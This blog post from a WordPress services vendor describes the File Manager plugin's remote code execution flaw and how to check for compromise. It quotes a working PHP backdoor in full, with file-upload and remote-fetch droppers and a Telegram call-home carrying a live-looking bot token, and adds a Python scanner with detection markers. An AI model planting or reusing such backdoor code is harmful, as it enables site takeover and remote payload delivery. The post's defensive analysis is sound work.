
A Plugin bug that is breaking thousands of WordPress Websites


Remote Code Execution Flaw in File Manager

On September 1st, a few web security providers detected suspicious activity on several WordPress sites. It turned out that hackers were exploiting a remote code execution (RCE) flaw on sites that had the “File Manager” plugin installed. File Manager is a popular WordPress plugin that lets you access your site’s files directly from the WordPress dashboard.

More digging by security experts revealed that hackers had gained access to WordPress sites through this plugin and were running malicious code and scripts. This zero-day vulnerability in the plugin’s core files could allow hackers to do anything they wanted: destroy target sites, steal confidential user information and corrupt databases.

File Manager released a security patch immediately, version 6.9, which fixes the vulnerabilities in versions 6.8 or older. Even so, File Manager is installed on over 700K websites, which is a huge concern. Kinsta’s malware and abuse engineer, S Aguilar, tweeted that “hundreds” of sites are at risk as malicious code is being uploaded under File Manager’s core path /wp-content/plugins/wp-file-manager/lib/files. Aguilar mentions that updating the plugin to version 6.9 mitigates the risk for site owners, but most site owners don’t take the time for this crucial step.

Nintechnet, a Thai web security service, shared a snippet of code they found lurking in the plugin files they scanned:

try {
    // Dropper 1: upload an arbitrary file one directory above the current one.
    // Access is gated by a hard-coded "password": token_admin hashed three times with MD5.
    if ($_POST['action'] == "wp_ajax_try_2020_v2") {
        if (!empty($_FILES['file']) and md5(md5(md5($_POST['token_admin']))) == "4baa15b2adf2fac31c44f28d9c86daa7") {
            if (function_exists("move_uploaded_file")) {
                @move_uploaded_file($_FILES['file']['tmp_name'], "../" . $_FILES['file']['name']);
                echo " file name : " . $_FILES['file']['name'];
            } else {
                die("no move_upload_file");
            }
        } else {
            die(0);
        }
        exit();
    }
    // Dropper 2: fetch a remote URL given in 'content' and write the response
    // to the local path given in 'name', behind the same hard-coded password check.
    if ($_POST['action'] == "wp_ajax_try_2020_v3") {
        if (!empty($_POST['content']) and md5(md5(md5($_POST['token_admin']))) == "4baa15b2adf2fac31c44f28d9c86daa7") {
            if (function_exists("file_get_contents")) {
                $html = file_get_contents($_POST['content']);
                $save = fopen($_POST['name'], "w");
                fwrite($save, $html);
                fclose($save);
            } else {
                die("no file_get_contents");
            }
        } else {
            die(0);
        }
        exit();
    }
} catch (Exception $e) {
    // Call-home on failure: the victim's IP address and the exception text are
    // posted to a Telegram bot (bot token and chat_id exactly as found in the file).
    if (function_exists("file_get_contents")) {
        try {
            file_get_contents("https://api.telegram.org/bot1234572065:AAGxojnCQEsIMuofDuQHaM-8wnM2VkYOMO4/sendMessage?chat_id=1110165405&text=" . urlencode($_SERVER['REMOTE_ADDR'] . "  error wp") . "");
            file_get_contents("https://api.telegram.org/bot1234572065:AAGxojnCQEsIMuofDuQHaM-8wnM2VkYOMO4/sendMessage?chat_id=1110165405&text=" . urlencode($e) . "");
        } catch (Exception $e2) {}
    }
}

Point of Access

The first to inform File Manager’s developers about this security flaw was the Finnish web hosting service Seravo. Seravo did its own research on the breach, closely monitoring patterns in traffic spikes and IP addresses.

On closer inspection, they discovered that botnets were exploiting this vulnerability in the wild; Aguilar’s tweet confirms this:

“There are two bots we’ve identified, one from Bangladesh and another one from France using Inulogic Virtual Private Servers. We are working on containing this now.”

Now what? Or: how do I know if my site is hacked?

All security experts who worked on this zero-day vulnerability had one key recommendation: update to File Manager version 6.9 now.

Wordfence suggested that users scan their File Manager plugin files for the following PHP files:

  1. hardfork.php
  2. hardfind.php
  3. x.php
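As an added illustration (not code from this post, from Wordfence or from the plugin’s authors), a small Python scanner that checks a wp-file-manager plugin directory for the three filenames above, for marker strings lifted from the backdoor snippet shown earlier, and for a plugin version older than 6.9. The fake plugin tree it builds is constructed for the demo, and the root file name plugin.php is an assumption, not the plugin’s real main file.

```python
import re
import tempfile
from pathlib import Path

# Indicator filenames named by Wordfence (from the post) plus marker strings
# taken from the backdoor snippet quoted above (action names, the triple-MD5
# hash, the Telegram call-home). Any hit on a real install needs a closer look.
IOC_FILENAMES = {"hardfork.php", "hardfind.php", "x.php"}
BACKDOOR_MARKERS = ("wp_ajax_try_2020_v2", "wp_ajax_try_2020_v3",
                    "4baa15b2adf2fac31c44f28d9c86daa7", "api.telegram.org/bot")
PATCHED_VERSION = (6, 9)  # first release the post says closes the hole

def parse_version(header_text):
    """Read 'Version: x.y' from a WordPress plugin header; None if absent."""
    m = re.search(r"^\s*\*?\s*Version:\s*([\d.]+)", header_text, re.M)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None

def scan_plugin(plugin_dir):
    """Scan one wp-file-manager install and return a findings dict."""
    root = Path(plugin_dir)
    found = {"ioc_files": [], "backdoor_files": [], "version": None}
    for php in sorted(root.rglob("*.php")):
        body = php.read_text(errors="replace")
        rel = php.relative_to(root).as_posix()
        if php.name in IOC_FILENAMES:
            found["ioc_files"].append(rel)
        if any(marker in body for marker in BACKDOOR_MARKERS):
            found["backdoor_files"].append(rel)
        # The main plugin file sits in the root and carries 'Plugin Name:'.
        if php.parent == root and "Plugin Name:" in body[:4096]:
            found["version"] = parse_version(body[:4096])
    ver = found["version"]
    found["outdated"] = ver is None or ver < PATCHED_VERSION
    return found

def build_sample_plugin():
    """Constructed fake plugin tree for an offline run (not a real install)."""
    root = Path(tempfile.mkdtemp())
    (root / "lib" / "files").mkdir(parents=True)
    (root / "plugin.php").write_text("<?php\n/*\nPlugin Name: File Manager\nVersion: 6.8\n*/\n")
    (root / "lib" / "files" / "hardfork.php").write_text("<?php echo 1;\n")
    (root / "lib" / "files" / "x.php").write_text(
        "<?php if($_POST['action']==\"wp_ajax_try_2020_v2\"){ /* dropper */ }\n")
    (root / "lib" / "safe.php").write_text("<?php // legitimate file\n")
    return root

if __name__ == "__main__":
    print(scan_plugin(build_sample_plugin()))
```

Point scan_plugin at a real /wp-content/plugins/wp-file-manager directory to run it on a live install; the sample tree only exists to show what a hit looks like.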

If you think your website is at risk, contact us at WP Uber for customized security reports and solutions. Follow WP Uber for more security updates.

Tim Michaels
I am into WordPress and web development for the last 10 years. I use my experience to help people just starting with WordPress. Follow my blog at WP Uber for everything related to WordPress.